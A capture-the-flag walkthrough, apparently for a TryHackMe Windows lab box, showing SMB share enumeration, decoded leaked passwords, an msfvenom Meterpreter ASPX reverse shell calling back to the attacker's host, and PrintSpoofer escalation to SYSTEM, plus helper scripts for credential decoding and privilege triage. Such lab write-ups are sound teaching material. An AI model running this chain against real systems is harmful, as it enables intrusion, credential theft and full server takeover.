Relevant

Reconnaissance

First, we begin with the usual nmap scan (service detection plus the default scripts, judging from the output) to see where we can start looking.

NMAP output
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 04:18 CET
Nmap scan report for 10.10.218.69
Host is up (0.093s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE        VERSION
80/tcp   open  http           Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc          Microsoft Windows RPC
139/tcp  open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds   Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open  ms-wbt-server?
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-12-21T03:13:52
|_Not valid after:  2022-06-22T03:13:52
| rdp-ntlm-info:
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2021-12-22T03:20:37+00:00
|_ssl-date: 2021-12-22T03:21:15+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h36m00s, deviation: 3h34m42s, median: 0s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2021-12-22T03:20:37
|_  start_date: 2021-12-22T03:14:38
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT
|   Workgroup: WORKGROUP
|_  System time: 2021-12-21T19:20:39-08:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.73 seconds

From this we see the web application is served by Microsoft IIS 10.0 on Windows Server 2016 (build 14393); nothing exciting on its own.

More interesting is SMB on 139/445: the scan's scripts got in with the guest account (account_used: guest), so anonymous access to the shares is worth a try. Note also that SMB message signing is enabled but not required.

Scanning

Listing shares with a null session works, and besides the default administrative shares there is a non-standard one, nt4wrksv.

smbclient -N -L //10.10.218.69
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk

Now we just have to connect to it and see what's there.

smbclient //10.10.218.69/nt4wrksv
Password for [WORKGROUP\max]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 25 23:46:04 2020
  ..                                  D        0  Sat Jul 25 23:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020

                7735807 blocks of size 4096. 4945463 blocks available
smb: \> cat passwords.txt
cat: command not found
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

Looks like we are lucky: a password file. Its contents are encoded rather than encrypted (the == padding and the character set point to base64), so let's see what's in it.

cat passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Exploiting

Now that we have the encoded passwords, we need to decode them. I used an online base64 decoder for this; base64 -d does the same thing locally, which is the better habit for anything that might be a real credential.

After decoding both lines, we are left with two users:

  • Bob - !P@$$W0rD!123
  • Bill - Juw4nnaM4n420696969!$$$
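
The decoding step, as a small script rather than a website. This is an added example and not part of the original writeup; it assumes GNU or BusyBox base64 (-d for decode), the sample file is constructed from the values shown above, and to_creds is a helper name of my own that rewrites "Name - password" into user:password so the pairs can be fed straight to a credential-spraying tool.

```shell
#!/bin/sh
# Added example (not from the original post): decode a "[User Passwords - Encoded]"
# file whose body is one base64 line per user, and emit user:password pairs.

# Decode every base64 line after the header into one cleartext line each.
decode_passwords() {
    tail -n +2 "$1" | while IFS= read -r line; do
        [ -n "$line" ] || continue           # skip blank lines
        printf '%s\n' "$line" | base64 -d    # fails noisily on malformed base64
        printf '\n'                          # decoded payloads carry no newline
    done
}

# Turn "Name - password" into "Name:password" (assumed helper name).
to_creds() {
    decode_passwords "$1" | sed 's/^\([^ ]*\) - /\1:/'
}

# Constructed sample input, matching the share's passwords.txt.
sample_file="$(mktemp)"
cat > "$sample_file" <<'EOF'
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
EOF

decode_passwords "$sample_file"
to_creds "$sample_file"
```

The header line is skipped unconditionally, so if a file has no header drop the tail call; anything that is not valid base64 makes base64 -d complain rather than silently producing garbage.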

Scanning a little more, I didn't find anywhere to use these credentials, so I started digging a bit.

A second nmap scan, this time with the -p- flag to cover all 65535 ports, turns up another HTTP service on port 49663, and that site has a directory with the same name as the share (/nt4wrksv/). In other words, the writable share is the folder IIS serves from: anything we put on the share becomes reachable over HTTP, and since IIS compiles and runs .aspx pages, an uploaded reverse shell executes as soon as we request it. (A harmless marker file, uploaded with put and then requested with curl, is a cheap way to confirm the mapping before dropping a payload.) So first, let's generate the reverse-shell payload.

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.8.208.63 lport=1337 -f aspx -o 1337.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of aspx file: 1010404 bytes
Saved as: 1337.aspx

Perfect. Before uploading that to the SMB share we need a listener, so we start metasploit's multi/handler. One thing to watch: the handler's payload should match what msfvenom generated (set payload windows/x64/meterpreter_reverse_tcp); the transcript below was started with the default generic/shell_reverse_tcp still configured.

Using metasploit as a listener for the reverse shell generated above
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v6.1.8-dev                           ]
+ -- --=[ 2167 exploits - 1149 auxiliary - 397 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Writing a custom module? After editing your
module, why not try the reload command

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.8.208.63
LHOST => 10.8.208.63
msf6 exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.8.208.63:1337 

Now we connect to the share again, upload the payload (put 1337.aspx at the smbclient prompt), and trigger it by requesting the page over HTTP; IIS compiles and runs the ASPX and the Meterpreter session lands in the handler. (relevant.thm is a local hosts entry for the target; the address in the handler output differs from the earlier scan because the machine was redeployed in between.)

curl http://relevant.thm:49663/nt4wrksv/1337.aspx
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.8.208.63:1337
[*] Meterpreter session 7 opened (10.8.208.63:1337 -> 10.10.232.253:49773) at 2021-12-22 05:24:46 +0100

meterpreter > whoami /priv
[-] Unknown command: whoami
meterpreter > shell
Process 2284 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>

We are inside the server. The user flag is at C:\Users\Bob\Desktop\user.txt; grab it and let's move on to escalating privileges.

Privilege Escalation

So we are on the server as iis apppool\defaultapppool, the IIS application pool identity.

Looking closer at our privileges, SeImpersonatePrivilege stands out. IIS application pool accounts (and most service accounts) hold it by default because they need to impersonate the clients they authenticate, and it is exactly what the well-known PrintSpoofer exploit abuses: PrintSpoofer coerces the Print Spooler service, which runs as SYSTEM, into connecting to a named pipe it controls, then impersonates that SYSTEM client and spawns a process with its token. The preconditions are just this privilege and a running Print Spooler service.
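
A quick triage of a saved whoami /priv listing, as an added example that is not part of the original writeup. It flags the privileges commonly abused for escalation (the impersonation pair used by PrintSpoofer and the Potato family, SeBackup/SeRestore for file access, SeDebug for process access, and so on); the list is my own selection, the function names are mine, and the input file is constructed from the output shown above. It deliberately reports Disabled privileges too: a process can enable any privilege already present in its token, so "Disabled" only means not currently switched on.

```shell
#!/bin/sh
# Added example (not from the original post): triage a saved "whoami /priv"
# listing for token privileges that are known to be abusable for escalation.

# Privileges worth flagging (assumed list). Disabled ones count too: a process
# can enable any privilege present in its token via AdjustTokenPrivileges.
ABUSABLE="SeImpersonatePrivilege SeAssignPrimaryTokenPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeLoadDriverPrivilege SeTakeOwnershipPrivilege SeTcbPrivilege SeCreateTokenPrivilege SeManageVolumePrivilege"

# Print "<privilege> <state>" for each abusable privilege found in the listing.
flag_privs() {
    awk -v list="$ABUSABLE" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) want[a[i]] = 1 }
        { sub(/\r$/, "") }                      # output pasted from Windows is CRLF
        # Privilege rows start with "Se..." and end with the State column.
        $1 ~ /^Se/ && ($NF == "Enabled" || $NF == "Disabled") {
            if ($1 in want) print $1, $NF
        }' "$1"
}

# Number of flagged privileges; non-zero means escalation is worth trying.
count_flagged() {
    flag_privs "$1" | wc -l | tr -d ' '
}

# Constructed sample input: the whoami /priv output from the IIS shell above.
privs_file="$(mktemp)"
cat > "$privs_file" <<'EOF'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
EOF

flag_privs "$privs_file"
```

On the listing above this reports SeAssignPrimaryTokenPrivilege (Disabled) and SeImpersonatePrivilege (Enabled), which is the standard signal to reach for an impersonation-based escalation.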

First, download the PrintSpoofer executable and upload it through the SMB share, exactly as we did with the payload.

Then, from the reverse shell, change into the directory backing the share (the one IIS serves from) and run it. -i asks for an interactive process and -c gives the command to launch with the SYSTEM token.

PrintSpoofer.exe -i -c powershell.exe
PrintSpoofer.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32>

That's it: PrintSpoofer handed us a PowerShell running as nt authority\system. Go and grab the flag at C:\Users\Administrator\Desktop\root.txt.

Hope you enjoyed it!